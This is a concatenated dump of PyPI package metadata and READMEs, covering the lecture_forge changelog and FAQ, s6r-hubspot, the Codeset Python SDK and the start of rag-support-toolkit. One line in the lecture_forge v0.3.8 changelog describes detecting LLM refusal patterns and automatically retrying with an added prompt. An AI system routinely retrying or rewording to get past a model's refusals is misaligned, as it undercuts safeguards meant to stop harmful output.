- **생성 시**: API 필요 (OpenAI, Serper 등)
- **생성 후**: HTML 파일과 지식창고는 오프라인 사용 가능
- **Chat 모드**: 지식창고는 오프라인 작동하지만 LLM API는 필요
</details>
<details>
<summary><b>Q: 품질 레벨의 차이는?</b></summary>
A:
| 레벨 | 임계값 | 용도 | 시간 |
|------|--------|------|------|
| `lenient` | 70점 | 빠른 초안 | 짧음 |
| `balanced` | 80점 | **기본값** ✅ | 보통 |
| `strict` | 90점 | 고품질 프로덕션 | 김 |
임계값 미달 시 최대 3회 자동 개선합니다.
</details>
<details>
<summary><b>Q: Chat 모드 종료 방법은?</b></summary>
A: 다음 중 하나 사용:
- `/exit` 또는 `/quit` (권장)
- `Ctrl+C` (강제 종료)
</details>
<details>
<summary><b>Q: 이미지가 제대로 매칭되지 않으면?</b></summary>
A: v0.2.0의 Location-based 매칭이 자동으로 작동합니다:
1. PDF 이미지: 85% 자동 매칭 (페이지 기반)
2. 웹 이미지: 키워드 기반 보완
3. 수동 편집: `lecture-forge edit-images`로 교체 가능
</details>
### 기술적 질문
<details>
<summary><b>Q: 테스트는 어떻게 실행하나요?</b></summary>
```bash
# 전체 테스트
pytest tests/ -v
# 커버리지 확인
pytest tests/ --cov=lecture_forge --cov-report=html
# 특정 테스트
pytest tests/unit/agents/test_content_writer.py -v
# 특정 에이전트만
pytest tests/unit/agents/ -v
```
</details>
<details>
<summary><b>Q: API 호출이 실패하면 어떻게 되나요?</b></summary>
A: v0.2.0부터 **자동 재시도** 기능이 있습니다:
- 최대 3회 재시도
- 지수 백오프: 2초 → 4초 → 10초
- 일시적 오류 자동 복구
- OpenAI, Serper, Pexels, Unsplash 모두 지원
</details>
<details>
<summary><b>Q: RAG 쿼리 캐싱은 어떻게 작동하나요?</b></summary>
A:
- 쿼리와 결과 개수를 MD5 해시로 변환하여 메모리 캐시
- 동일 질문은 **60% 빠른 응답**
- 캐시 히트/미스 통계 자동 추적
- 세션 동안 유지 (프로세스 종료 시 초기화)
</details>
<details>
<summary><b>Q: 설정을 환경별로 다르게 하려면?</b></summary>
A: `.env` 파일을 환경별로 분리하세요:
```bash
# 개발 환경
.env.development
# 프로덕션 환경
.env.production
# 사용
cp .env.production .env
lecture-forge create
```
</details>
---
## 📝 변경 이력
### v0.3.8 (2026-02-20) - 🧠 RMC 자기검토
- 🧠 **RMC (Reflective Meta-Cognition)** 3개 에이전트에 적용 (2단계 자기검토: Layer 1 검토 + Layer 2 검토의 검토)
- `CurriculumDesigner._review_with_rmc()`: 섹션 순서 난이도, 학습목표 커버리지, 선수 내용 순서 자동 수정
- `ContentWriter._review_content_with_rmc()`: 개념 비약·흐름 단절·중복 의미론적 검토 후 수정
- `QAAgent._review_answer_with_rmc()`: 주장별 ✓/~/✗ 분류 → 할루시네이션 항목 제거 또는 경고
- 🐛 결론/도입 섹션 LLM 거부 응답 수정: 안전 프롬프트 + 거부 패턴 감지 자동 재시도
- 🐛 `--with-notes` Mermaid `-->` → `-->` 인코딩 버그 수정 (`SlideNotesGenerator`)
- ✅ Python 3.13 전체 의존성 호환 검증
### v0.3.7 (2026-02-18) - 🖼️ UI & 슬라이드 개선
- 🖼️ **Lightbox**: 강의 HTML에서 이미지·Mermaid 다이어그램 클릭 시 전체화면 모달 확대
- 🔍 **검색 개선**: Lunr.js → 서브스트링 검색 (한국어·영어 혼합 완벽 지원)
- 📊 **Mermaid 전체 너비**: 슬라이드에서 ~300px → ~1180px (`width: 100%`)
- 🐛 Mermaid 10 API 수정: `contentLoaded()` → `mermaid.run()`, `startOnLoad: false`
### v0.3.6 (2026-02-18) - 🔧 코드 품질 & 안정성
- 🐛 `BaseAgent.temperature=0.0` falsy 버그 수정
- 🐛 `QAAgent` 하드코딩 경로 → `Config.USER_CONFIG_DIR`
- 🔧 `utils/retry.py`: `make_api_retry()` 공통 팩토리 (중복 4곳 제거)
- 🏗️ `BaseImageSearchTool`: Unsplash/Pexels 공통 로직 추출 (~100줄 감소)
- ⚙️ RAG 파라미터 환경변수 지원: `RAG_QA_N_RESULTS`, `RAG_QA_TOP_K`, `RAG_CONTENT_N_RESULTS`
- ✅ Config 검증: `IMAGE_WEIGHT_*`, `CONTENT_*_RATIO` 합계 1.0 검증
- 💬 Chat 응답 `conversation_log.txt` 저장 (질문 + AI 답변 모두)
- 🧪 async 도구 테스트 23개 추가
### v0.3.5 (2026-02-18) - 🎯 RAG 품질 대폭 향상
- 🎯 **400단어 구조화 답변**: 5개 Markdown 섹션 강제 (개요/상세/핵심/예시/추가고려)
- 🔍 **검색 강화**: n_results 10→15, top_k 8→12 (+50%), source-page당 최대 3개 chunks
- 🌡️ temperature 0.7→0.3 (정확성 향상), Rich Markdown Panel 렌더링
- 🐛 ChromaDB L2 신뢰도 버그 수정: `1 - distance` → `max(0, 1 - distance/2)` (항상 0% 해결)
- 🔧 `pkg_resources.path` → `importlib.resources.files()` (Python 3.11+ deprecation 제거)
### v0.3.4 (2026-02-16) - ⚡ Async I/O 지원
- ⚡ **AsyncContentCollectorAgent**: PDF·URL·검색 병렬 처리 (70% 성능 향상)
- 🌐 **Async Tools**: httpx 기반 web scraper, Serper search, Rate limiting
- 🚀 `--async-mode` CLI 플래그 (실험적), 기존 sync 100% 호환
### v0.3.3 (2026-02-15) - ⌨️ 입력 시스템 개선
- ⌨️ **prompt-toolkit 도입**: 한국어·멀티바이트 완벽 지원, 백스페이스/방향키 정상 작동
- 📜 입력 히스토리 (`chat_history.txt`), ↑/↓ 탐색, Ctrl+R 검색
- 💡 자동 제안 (이전 질문 기반), 편집 단축키 (Ctrl+A/E, Alt+←/→)
- 🔧 NumPy 1.26.0+ (Python 3.12 공식 지원)
### v0.3.2 (2026-02-14) - 🌐 다국어 지원
- 🌐 **자동 언어 감지**: chunk 단위 언어 감지 (langdetect)
- 🔍 **Cross-lingual Dual Query**: 한국어 질문 → 영어 문서도 검색 (자동 번역)
- 🎯 지능형 재랭킹: 같은 언어 우선 + cross-lingual 보너스
- 🛠️ 기존 Vector DB 마이그레이션 도구 (`migrate_add_language_metadata.py`)
### v0.3.1 (2026-02-13) - 📂 사용자 친화적 디렉토리
- 📂 `~/.lecture-forge/` (히든) → `~/Documents/LectureForge/` (일반 폴더)
- 🏠 `home` 커맨드 추가: `outputs`, `data`, `kb`, `env` 빠른 접근
- 🔄 자동 마이그레이션: 기존 데이터 자동 이동 (하위 호환)
### v0.3.0 (2026-02-12) - 🎯 프레젠테이션 최적화
- 🎯 슬라이드당 항목 수 4→3, 긴 리스트 자동 분할 (최대 5개씩)
- 🎨 제목 크기/색상 계층화, 타이포그래피 최적화, 코드 블록 입체감
- 📊 텍스트 다이어그램 → Mermaid 변환 (아키텍처, 예외 계층, 품질 평가)
- 🎯 예외 처리 시스템 (9개 카테고리) + 템플릿 기반 프롬프트 관리
### v0.2.6 (2026-02-12) - 🐛 이미지 버그 수정
- 🐛 `pil_image.thumbnail()` 원본 수정 버그 수정 → `pil_image.copy()` 후 분석
- 증상: 모든 PDF 이미지가 200px 너비로 저장됨 → 원본 크기 완전 보존
### v0.2.1–0.2.5 (2026-02-10~12) - 버그 수정 및 품질 개선
- 🐛 Visual score, 품질 평가, 슬라이드 생성 버그 수정
- 🎨 이미지 Full HD·고품질 WebP, IMAGE_MIN_WIDTH=500 강화
### v0.2.0 (2026-02-09) - 🚀 Enhanced Quality Release
- ⚡ RAG 쿼리 캐싱 (60% 성능 향상), 자동 API 재시도 (지수 백오프)
- 🧪 77+ 단위 테스트, 타입 힌트 40% → 75%
- 🔧 Config 리팩토링: 모든 하드코딩 제거, 15+ 환경변수 기반 설정
### v0.1.0 (2026-02-08) - 🎉 Initial Release
- 10개 전문 에이전트, 멀티소스 수집 (PDF·URL·검색)
- Location-based 이미지 매칭 (+750%), ChromaDB 지식창고
- 6차원 품질 평가, HTML 출력, Reveal.js 슬라이드 변환
---
## 🤝 기여하기
기여를 환영합니다! 다음 절차를 따라주세요:
1. **이슈 생성**: 변경사항을 먼저 논의
2. **포크 & 브랜치**: feature 브랜치 생성
3. **테스트 작성**: 새 기능에 대한 테스트 추가
4. **PR 제출**: 변경사항 설명과 함께 제출
자세한 내용은 `CONTRIBUTING.md`를 참조하세요.
---
## 📄 라이선스
MIT License - 자세한 내용은 [LICENSE](LICENSE) 참조
---
## 📞 지원 및 문의
- **이슈 트래커**: [GitHub Issues](https://github.com/bullpeng72/Lecture_forge/issues)
- **프로젝트 가이드**: [CLAUDE.md](CLAUDE.md)
- **기술 분석**: [INPUT_LIMITS_ANALYSIS.md](docs/INPUT_LIMITS_ANALYSIS.md)
- **테스트 가이드**: [tests/README.md](tests/README.md)
---
## 🙏 감사의 말
이 프로젝트는 다음 오픈소스 프로젝트들을 활용합니다:
- [LangChain](https://github.com/langchain-ai/langchain) - Multi-Agent 프레임워크
- [ChromaDB](https://github.com/chroma-core/chroma) - 벡터 데이터베이스
- [OpenAI](https://openai.com) - GPT-4o 모델
- [Serper](https://serper.dev) - 검색 API
- [Pexels](https://pexels.com) & [Unsplash](https://unsplash.com) - 이미지 API
---
<p align="center">
<b>Made with ❤️ by Sungwoo Kim</b><br>
⭐ 이 프로젝트가 도움이 되었다면 GitHub Star를 눌러주세요!
</p>
| text/markdown | Sungwoo Kim | Sungwoo Kim <sungwoo.kim@gmail.com> | null | null | MIT License
Copyright (c) 2026 LectureForge Contributors
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
| ai, education, lecture, langchain, multiagent, multilingual, rag | [
"Development Status :: 4 - Beta",
"Intended Audience :: Education",
"Topic :: Education",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13"
] | [] | https://github.com/bullpeng72/Lecture_forge | null | >=3.11 | [] | [] | [] | [
"langchain<0.4.0,>=0.3.27",
"langchain-openai<0.4.0,>=0.2.0",
"langchain-core<0.4.0,>=0.3.76",
"openai<2.0.0,>=1.12.0",
"chromadb<2.0.0,>=1.1.0",
"pymupdf<2.0.0,>=1.23.0",
"beautifulsoup4<5.0.0,>=4.12.0",
"requests<3.0.0,>=2.31.0",
"pillow<11.0.0,>=10.2.0",
"numpy<2.0.0,>=1.26.0",
"scipy<2.0.0,>=1.11.0",
"jinja2<4.0.0,>=3.1.3",
"markdown<4.0.0,>=3.5.0",
"pygments<3.0.0,>=2.17.0",
"click<9.0.0,>=8.1.7",
"rich<14.0.0,>=13.7.0",
"rich-click<2.0.0,>=1.7.0",
"prompt-toolkit<4.0.0,>=3.0.0",
"python-dotenv<2.0.0,>=1.0.0",
"pydantic<3.0.0,>=2.5.0",
"pyyaml<7.0.0,>=6.0.1",
"tenacity<9.0.0,>=8.0.0",
"langdetect<2.0.0,>=1.0.9",
"httpx<1.0.0,>=0.24.0",
"pytest>=7.4.0; extra == \"dev\"",
"pytest-cov>=4.1.0; extra == \"dev\"",
"pytest-mock>=3.11.0; extra == \"dev\"",
"pytest-asyncio>=0.21.0; extra == \"dev\"",
"black>=23.7.0; extra == \"dev\"",
"flake8>=6.1.0; extra == \"dev\"",
"mypy>=1.5.0; extra == \"dev\"",
"pylint>=2.17.0; extra == \"dev\"",
"bandit>=1.7.5; extra == \"dev\"",
"safety>=2.3.0; extra == \"dev\"",
"pre-commit>=3.3.0; extra == \"dev\""
] | [] | [] | [] | [
"Homepage, https://github.com/bullpeng72/Lecture_forge"
] | twine/6.2.0 CPython/3.11.14 | 2026-02-20T09:34:07.408334 | lecture_forge-0.3.8.tar.gz | 279,783 | 34/b1/6a183db1bc22371965c589ffbdde34b9a2f698a478039b9443b7167687c0/lecture_forge-0.3.8.tar.gz | source | sdist | null | false | 264732172cb36dfc2f8c4d6097fb7180 | 415a0b29004b74365d5d0f3bedc8674d18ffd8336db50ae59fb9809628dc87c6 | 34b16a183db1bc22371965c589ffbdde34b9a2f698a478039b9443b7167687c0 | null | [
"LICENSE"
] | 218 |
2.4 | s6r-hubspot | 1.0.17 | Hubspot API client | # s6r-hubspot
## Installation
```bash
pip install s6r-hubspot
```
## Usage
```python
from s6r_hubspot import HubspotConnection
hubspot = HubspotConnection('your_access_token')
owners = hubspot.get_owners()
```
### Unit tests
To run unit_test file, you need to set up a token of an empty hubspot base in an environnement variable name
HUBSPOT_TOKEN:
```bash
export HUBSPOT_TOKEN='your_token'
```
## License
This project is licensed under the [GNU Lesser General Public License (LGPL) Version 3](https://www.gnu.org/licenses/lgpl-3.0.html).
## Contributing
Contributions are welcome! If you find any issues or have suggestions for improvements,
please open an issue or submit a pull request.
- GitHub Repository: [ScalizerOrg/s6r-hubspot](https://github.com/ScalizerOrg/s6r-hubspot)
## Contributors
* David Halgand - [GitHub](https://github.com/halgandd)
* Morgane Goujon - [GitHub](https://github.com/MorganeGoujon)
* Khalid Bentaleb - [GitHub](https://github.com/kbentaleb)
* Michel Perrocheau - [GitHub](https://github.com/myrrkel)
## Maintainer
This software is maintained by [Scalizer](https://www.scalizer.fr).
<div style="text-align: center;">
[](https://www.scalizer.fr)
</div>
| text/markdown | null | Michel Perrocheau <michel@scalizer.fr> | null | null | GNU LESSER GENERAL PUBLIC LICENSE
Version 3, 29 June 2007
Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/>
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
This version of the GNU Lesser General Public License incorporates
the terms and conditions of version 3 of the GNU General Public
License, supplemented by the additional permissions listed below.
0. Additional Definitions.
As used herein, "this License" refers to version 3 of the GNU Lesser
General Public License, and the "GNU GPL" refers to version 3 of the GNU
General Public License.
"The Library" refers to a covered work governed by this License,
other than an Application or a Combined Work as defined below.
An "Application" is any work that makes use of an interface provided
by the Library, but which is not otherwise based on the Library.
Defining a subclass of a class defined by the Library is deemed a mode
of using an interface provided by the Library.
A "Combined Work" is a work produced by combining or linking an
Application with the Library. The particular version of the Library
with which the Combined Work was made is also called the "Linked
Version".
The "Minimal Corresponding Source" for a Combined Work means the
Corresponding Source for the Combined Work, excluding any source code
for portions of the Combined Work that, considered in isolation, are
based on the Application, and not on the Linked Version.
The "Corresponding Application Code" for a Combined Work means the
object code and/or source code for the Application, including any data
and utility programs needed for reproducing the Combined Work from the
Application, but excluding the System Libraries of the Combined Work.
1. Exception to Section 3 of the GNU GPL.
You may convey a covered work under sections 3 and 4 of this License
without being bound by section 3 of the GNU GPL.
2. Conveying Modified Versions.
If you modify a copy of the Library, and, in your modifications, a
facility refers to a function or data to be supplied by an Application
that uses the facility (other than as an argument passed when the
facility is invoked), then you may convey a copy of the modified
version:
a) under this License, provided that you make a good faith effort to
ensure that, in the event an Application does not supply the
function or data, the facility still operates, and performs
whatever part of its purpose remains meaningful, or
b) under the GNU GPL, with none of the additional permissions of
this License applicable to that copy.
3. Object Code Incorporating Material from Library Header Files.
The object code form of an Application may incorporate material from
a header file that is part of the Library. You may convey such object
code under terms of your choice, provided that, if the incorporated
material is not limited to numerical parameters, data structure
layouts and accessors, or small macros, inline functions and templates
(ten or fewer lines in length), you do both of the following:
a) Give prominent notice with each copy of the object code that the
Library is used in it and that the Library and its use are
covered by this License.
b) Accompany the object code with a copy of the GNU GPL and this license
document.
4. Combined Works.
You may convey a Combined Work under terms of your choice that,
taken together, effectively do not restrict modification of the
portions of the Library contained in the Combined Work and reverse
engineering for debugging such modifications, if you also do each of
the following:
a) Give prominent notice with each copy of the Combined Work that
the Library is used in it and that the Library and its use are
covered by this License.
b) Accompany the Combined Work with a copy of the GNU GPL and this license
document.
c) For a Combined Work that displays copyright notices during
execution, include the copyright notice for the Library among
these notices, as well as a reference directing the user to the
copies of the GNU GPL and this license document.
d) Do one of the following:
0) Convey the Minimal Corresponding Source under the terms of this
License, and the Corresponding Application Code in a form
suitable for, and under terms that permit, the user to
recombine or relink the Application with a modified version of
the Linked Version to produce a modified Combined Work, in the
manner specified by section 6 of the GNU GPL for conveying
Corresponding Source.
1) Use a suitable shared library mechanism for linking with the
Library. A suitable mechanism is one that (a) uses at run time
a copy of the Library already present on the user's computer
system, and (b) will operate properly with a modified version
of the Library that is interface-compatible with the Linked
Version.
e) Provide Installation Information, but only if you would otherwise
be required to provide such information under section 6 of the
GNU GPL, and only to the extent that such information is
necessary to install and execute a modified version of the
Combined Work produced by recombining or relinking the
Application with a modified version of the Linked Version. (If
you use option 4d0, the Installation Information must accompany
the Minimal Corresponding Source and Corresponding Application
Code. If you use option 4d1, you must provide the Installation
Information in the manner specified by section 6 of the GNU GPL
for conveying Corresponding Source.)
5. Combined Libraries.
You may place library facilities that are a work based on the
Library side by side in a single library together with other library
facilities that are not Applications and are not covered by this
License, and convey such a combined library under terms of your
choice, if you do both of the following:
a) Accompany the combined library with a copy of the same work based
on the Library, uncombined with any other library facilities,
conveyed under the terms of this License.
b) Give prominent notice with the combined library that part of it
is a work based on the Library, and explaining where to find the
accompanying uncombined form of the same work.
6. Revised Versions of the GNU Lesser General Public License.
The Free Software Foundation may publish revised and/or new versions
of the GNU Lesser General Public License from time to time. Such new
versions will be similar in spirit to the present version, but may
differ in detail to address new problems or concerns.
Each version is given a distinguishing version number. If the
Library as you received it specifies that a certain numbered version
of the GNU Lesser General Public License "or any later version"
applies to it, you have the option of following the terms and
conditions either of that published version or of any later version
published by the Free Software Foundation. If the Library as you
received it does not specify a version number of the GNU Lesser
General Public License, you may choose any version of the GNU Lesser
General Public License ever published by the Free Software Foundation.
If the Library as you received it specifies that a proxy can decide
whether future versions of the GNU Lesser General Public License shall
apply, that proxy's public statement of acceptance of any version is
permanent authorization for you to choose that version for the
Library.
| hubspot | [
"License :: OSI Approved :: GNU Lesser General Public License v3 (LGPLv3)",
"Programming Language :: Python",
"Programming Language :: Python :: 3"
] | [] | null | null | >=3.9 | [] | [] | [] | [
"twine; extra == \"dev\"",
"bumpver; extra == \"dev\"",
"pip-tools; extra == \"dev\"",
"pytest; extra == \"dev\"",
"check-manifest; extra == \"dev\""
] | [] | [] | [] | [
"Homepage, https://github.com/ScalizerOrg/s6r-hubspot"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:34:02.772072 | s6r_hubspot-1.0.17.tar.gz | 17,245 | 20/a2/dc49b7941f9917916b9bc4785ae59d6669bc32156306ef5d8cfdfb2ef0e3/s6r_hubspot-1.0.17.tar.gz | source | sdist | null | false | a0c8892aaa17fcf9865873232b6de5dc | b112e7ded86062d402a4b6b4515943bcb37fad400306c1f064634a98eceb4707 | 20a2dc49b7941f9917916b9bc4785ae59d6669bc32156306ef5d8cfdfb2ef0e3 | null | [
"LICENSE"
] | 225 |
2.3 | codeset | 0.9.0 | The official Python library for the codeset API | # Codeset Python API library
<!-- prettier-ignore -->
[)](https://pypi.org/project/codeset/)
The Codeset Python library provides convenient access to the Codeset REST API from any Python 3.9+
application. The library includes type definitions for all request params and response fields,
and offers both synchronous and asynchronous clients powered by [httpx](https://github.com/encode/httpx).
It is generated with [Stainless](https://www.stainless.com/).
## Documentation
The REST API documentation can be found on [docs.codeset.ai](https://docs.codeset.ai). The full API of this library can be found in [api.md](https://github.com/codeset-ai/codeset-sdk/tree/main/api.md).
## Installation
```sh
# install from PyPI
pip install codeset
```
## Usage
The full API of this library can be found in [api.md](https://github.com/codeset-ai/codeset-sdk/tree/main/api.md).
```python
import os
from codeset import Codeset
client = Codeset(
api_key=os.environ.get("CODESET_API_KEY"), # This is the default and can be omitted
)
response = client.health.check()
print(response.service)
```
While you can provide an `api_key` keyword argument,
we recommend using [python-dotenv](https://pypi.org/project/python-dotenv/)
to add `CODESET_API_KEY="My API Key"` to your `.env` file
so that your API Key is not stored in source control.
## Async usage
Simply import `AsyncCodeset` instead of `Codeset` and use `await` with each API call:
```python
import os
import asyncio
from codeset import AsyncCodeset
client = AsyncCodeset(
api_key=os.environ.get("CODESET_API_KEY"), # This is the default and can be omitted
)
async def main() -> None:
response = await client.health.check()
print(response.service)
asyncio.run(main())
```
Functionality between the synchronous and asynchronous clients is otherwise identical.
### With aiohttp
By default, the async client uses `httpx` for HTTP requests. However, for improved concurrency performance you may also use `aiohttp` as the HTTP backend.
You can enable this by installing `aiohttp`:
```sh
# install from PyPI
pip install codeset[aiohttp]
```
Then you can enable it by instantiating the client with `http_client=DefaultAioHttpClient()`:
```python
import os
import asyncio
from codeset import DefaultAioHttpClient
from codeset import AsyncCodeset
async def main() -> None:
async with AsyncCodeset(
api_key=os.environ.get("CODESET_API_KEY"), # This is the default and can be omitted
http_client=DefaultAioHttpClient(),
) as client:
response = await client.health.check()
print(response.service)
asyncio.run(main())
```
## Using types
Nested request parameters are [TypedDicts](https://docs.python.org/3/library/typing.html#typing.TypedDict). Responses are [Pydantic models](https://docs.pydantic.dev) which also provide helper methods for things like:
- Serializing back into JSON, `model.to_json()`
- Converting to a dictionary, `model.to_dict()`
Typed requests and responses provide autocomplete and documentation within your editor. If you would like to see type errors in VS Code to help catch bugs earlier, set `python.analysis.typeCheckingMode` to `basic`.
## Handling errors
When the library is unable to connect to the API (for example, due to network connection problems or a timeout), a subclass of `codeset.APIConnectionError` is raised.
When the API returns a non-success status code (that is, 4xx or 5xx
response), a subclass of `codeset.APIStatusError` is raised, containing `status_code` and `response` properties.
All errors inherit from `codeset.APIError`.
```python
import codeset
from codeset import Codeset
client = Codeset()
try:
client.health.check()
except codeset.APIConnectionError as e:
print("The server could not be reached")
print(e.__cause__) # an underlying Exception, likely raised within httpx.
except codeset.RateLimitError as e:
print("A 429 status code was received; we should back off a bit.")
except codeset.APIStatusError as e:
print("Another non-200-range status code was received")
print(e.status_code)
print(e.response)
```
Error codes are as follows:
| Status Code | Error Type |
| ----------- | -------------------------- |
| 400 | `BadRequestError` |
| 401 | `AuthenticationError` |
| 403 | `PermissionDeniedError` |
| 404 | `NotFoundError` |
| 422 | `UnprocessableEntityError` |
| 429 | `RateLimitError` |
| >=500 | `InternalServerError` |
| N/A | `APIConnectionError` |
### Retries
Certain errors are automatically retried 0 times by default, with a short exponential backoff.
Connection errors (for example, due to a network connectivity problem), 408 Request Timeout, 409 Conflict,
429 Rate Limit, and >=500 Internal errors are all retried by default.
You can use the `max_retries` option to configure or disable retry settings:
```python
from codeset import Codeset
# Configure the default for all requests:
client = Codeset(
# default is 2
max_retries=0,
)
# Or, configure per-request:
client.with_options(max_retries=5).health.check()
```
### Timeouts
By default requests time out after 5 minutes. You can configure this with a `timeout` option,
which accepts a float or an [`httpx.Timeout`](https://www.python-httpx.org/advanced/timeouts/#fine-tuning-the-configuration) object:
```python
from codeset import Codeset
# Configure the default for all requests:
client = Codeset(
# 20 seconds (default is 5 minutes)
timeout=20.0,
)
# More granular control:
client = Codeset(
timeout=httpx.Timeout(60.0, read=5.0, write=10.0, connect=2.0),
)
# Override per-request:
client.with_options(timeout=5.0).health.check()
```
On timeout, an `APITimeoutError` is thrown.
Note that requests that time out are [retried twice by default](https://github.com/codeset-ai/codeset-sdk/tree/main/#retries).
## Advanced
### Logging
We use the standard library [`logging`](https://docs.python.org/3/library/logging.html) module.
You can enable logging by setting the environment variable `CODESET_LOG` to `info`.
```shell
$ export CODESET_LOG=info
```
Or to `debug` for more verbose logging.
### How to tell whether `None` means `null` or missing
In an API response, a field may be explicitly `null`, or missing entirely; in either case, its value is `None` in this library. You can differentiate the two cases with `.model_fields_set`:
```py
if response.my_field is None:
if 'my_field' not in response.model_fields_set:
print('Got json like {}, without a "my_field" key present at all.')
else:
print('Got json like {"my_field": null}.')
```
### Accessing raw response data (e.g. headers)
The "raw" Response object can be accessed by prefixing `.with_raw_response.` to any HTTP method call, e.g.,
```py
from codeset import Codeset
client = Codeset()
response = client.health.with_raw_response.check()
print(response.headers.get('X-My-Header'))
health = response.parse() # get the object that `health.check()` would have returned
print(health.service)
```
These methods return an [`APIResponse`](https://github.com/codeset-ai/codeset-sdk/tree/main/src/codeset/_response.py) object.
The async client returns an [`AsyncAPIResponse`](https://github.com/codeset-ai/codeset-sdk/tree/main/src/codeset/_response.py) with the same structure, the only difference being `await`able methods for reading the response content.
#### `.with_streaming_response`
The above interface eagerly reads the full response body when you make the request, which may not always be what you want.
To stream the response body, use `.with_streaming_response` instead, which requires a context manager and only reads the response body once you call `.read()`, `.text()`, `.json()`, `.iter_bytes()`, `.iter_text()`, `.iter_lines()` or `.parse()`. In the async client, these are async methods.
```python
with client.health.with_streaming_response.check() as response:
print(response.headers.get("X-My-Header"))
for line in response.iter_lines():
print(line)
```
The context manager is required so that the response will reliably be closed.
### Making custom/undocumented requests
This library is typed for convenient access to the documented API.
If you need to access undocumented endpoints, params, or response properties, the library can still be used.
#### Undocumented endpoints
To make requests to undocumented endpoints, you can make requests using `client.get`, `client.post`, and other
http verbs. Options on the client will be respected (such as retries) when making this request.
```py
import httpx
response = client.post(
"/foo",
cast_to=httpx.Response,
body={"my_param": True},
)
print(response.headers.get("x-foo"))
```
#### Undocumented request params
If you want to explicitly send an extra param, you can do so with the `extra_query`, `extra_body`, and `extra_headers` request
options.
#### Undocumented response properties
To access undocumented response properties, you can access the extra fields like `response.unknown_prop`. You
can also get all the extra fields on the Pydantic model as a dict with
[`response.model_extra`](https://docs.pydantic.dev/latest/api/base_model/#pydantic.BaseModel.model_extra).
### Configuring the HTTP client
You can directly override the [httpx client](https://www.python-httpx.org/api/#client) to customize it for your use case, including:
- Support for [proxies](https://www.python-httpx.org/advanced/proxies/)
- Custom [transports](https://www.python-httpx.org/advanced/transports/)
- Additional [advanced](https://www.python-httpx.org/advanced/clients/) functionality
```python
import httpx
from codeset import Codeset, DefaultHttpxClient
client = Codeset(
# Or use the `CODESET_BASE_URL` env var
base_url="http://my.test.server.example.com:8083",
http_client=DefaultHttpxClient(
proxy="http://my.test.proxy.example.com",
transport=httpx.HTTPTransport(local_address="0.0.0.0"),
),
)
```
You can also customize the client on a per-request basis by using `with_options()`:
```python
client.with_options(http_client=DefaultHttpxClient(...))
```
### Managing HTTP resources
By default the library closes underlying HTTP connections whenever the client is [garbage collected](https://docs.python.org/3/reference/datamodel.html#object.__del__). You can manually close the client using the `.close()` method if desired, or with a context manager that closes when exiting.
```py
from codeset import Codeset
with Codeset() as client:
# make requests here
...
# HTTP client is now closed
```
## Versioning
This package generally follows [SemVer](https://semver.org/spec/v2.0.0.html) conventions, though certain backwards-incompatible changes may be released as minor versions:
1. Changes that only affect static types, without breaking runtime behavior.
2. Changes to library internals which are technically public but not intended or documented for external use. _(Please open a GitHub issue to let us know if you are relying on such internals.)_
3. Changes that we do not expect to impact the vast majority of users in practice.
We take backwards-compatibility seriously and work hard to ensure you can rely on a smooth upgrade experience.
We are keen for your feedback; please open an [issue](https://www.github.com/codeset-ai/codeset-sdk/issues) with questions, bugs, or suggestions.
### Determining the installed version
If you've upgraded to the latest version but aren't seeing any new features you were expecting then your python environment is likely still using an older version.
You can determine the version that is being used at runtime with:
```py
import codeset
print(codeset.__version__)
```
## Requirements
Python 3.9 or higher.
## Contributing
See [the contributing documentation](https://github.com/codeset-ai/codeset-sdk/tree/main/./CONTRIBUTING.md).
| text/markdown | Codeset | null | null | null | Apache-2.0 | null | [
"Intended Audience :: Developers",
"License :: OSI Approved :: Apache Software License",
"Operating System :: MacOS",
"Operating System :: Microsoft :: Windows",
"Operating System :: OS Independent",
"Operating System :: POSIX",
"Operating System :: POSIX :: Linux",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14",
"Topic :: Software Development :: Libraries :: Python Modules",
"Typing :: Typed"
] | [] | null | null | >=3.9 | [] | [] | [] | [
"anyio<5,>=3.5.0",
"distro<2,>=1.7.0",
"httpx<1,>=0.23.0",
"pydantic<3,>=1.9.0",
"sniffio",
"typing-extensions<5,>=4.10",
"aiohttp; extra == \"aiohttp\"",
"httpx-aiohttp>=0.1.9; extra == \"aiohttp\""
] | [] | [] | [] | [
"Homepage, https://github.com/codeset-ai/codeset-sdk",
"Repository, https://github.com/codeset-ai/codeset-sdk"
] | twine/5.1.1 CPython/3.12.9 | 2026-02-20T09:33:59.722656 | codeset-0.9.0.tar.gz | 116,036 | af/e8/8695cd29dd68e2ed8e6a79b0beeaf0f7ab1b903c40fdeee6ca20f5f9a3fe/codeset-0.9.0.tar.gz | source | sdist | null | false | e9aa4eedc537e1b96d8a76adce2adbc3 | 9045334935e509fb321ef293ce480557507c5f26f60d8725481c21c39f3fb7c5 | afe88695cd29dd68e2ed8e6a79b0beeaf0f7ab1b903c40fdeee6ca20f5f9a3fe | null | [] | 222 |
2.4 | rag-support-toolkit | 0.1.1 | FAISS-based RAG utility library | # rag-toolkit
FAISS ベースの RAG(Retrieval-Augmented Generation)ユーティリティライブラリです。
## インストール
```bash
pip install -e .
# PDF から DB を作る場合は追加で必要
pip install pdfminer.six
```
---
## ディレクトリ構成
```
rag_toolkit/
├── __init__.py
├── builders/
